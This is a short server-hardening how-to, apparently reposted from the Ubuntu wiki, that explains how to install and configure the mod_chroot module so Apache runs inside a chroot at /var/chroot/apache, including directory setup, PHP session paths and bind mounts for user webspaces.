mod_chroot is a module for the apache webserver to easily run the httpd in a chroot (especially important for all the scripts). Because of this scripts cannot effect anything outside the chroot and makes it much more difficult to gain access to a server through the webserver for an attacker.
NOTE: apache-2.2.10 and higher has built in chroot handling and the mod_chroot module should not be used.

Why is it so fancy?

Good thing about this module is that you don’t have to maintain a chroot containing every file the apache httpd may need (libraries, etc.).

TODO

  • Include a solution to handle sending email from the chroot with PHP mail() function. Several possibilities are available. Didn't test any because I didn't need it myself.
  • Add more information for services which might be affected.
  • Include information regarding DNS resolving.

HOWTO

Its aimed at my local setup so you might want to change some paths/leave some parts out. I decided to locate the chroot at /var/chroot/apache

Install & Configure

install the module

apt-get install libapache2-mod-chroot

enable the module

a2enmod mod_chroot

set chroot path

echo "ChrootDir /var/chroot/apache" > /etc/apache2/conf.d/mod_chroot

Build chroot

create the chroot directory

mkdir -p /var/chroot/apache

apache needs this to run

mkdir -p /var/chroot/apache/var/run 

PHP5 Session stuff

Some PHP5 programs might need this. At least dokuwiki wanted to create some session file (maybe you don't need this)
mkdir -p /var/chroot/apache/var/lib/php5
use chmod to set php5 dir to drwx-wx-wt

Fixing up mod_user

In case you want to user mod_user for the personal webspaces of users (hostname/~username)

/home and /etc/passwd are nessecary in the chroot

mkdir -p /var/chroot/apache/home
mkdir -p /var/chroot/apache/etc
touch /var/chroot/apache/etc/passwd
echo "/home /var/chroot/apache/home none bind 0 0" >> /etc/fstab
echo "/etc/passwd /var/chroot/apache/etc/passwd none bind 0 0" >> /etc/fstab
obviously you also have to mount them

Fix apache2ctl

ln -s /var/chroot/apache/var/run/apache2.pid /var/run/apache2.pid

Finish it up

restart apache2 to load mod_chroot

/etc/init.d/apache2 restart
 
Source: https://wiki.ubuntu.com/ModChroot 
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |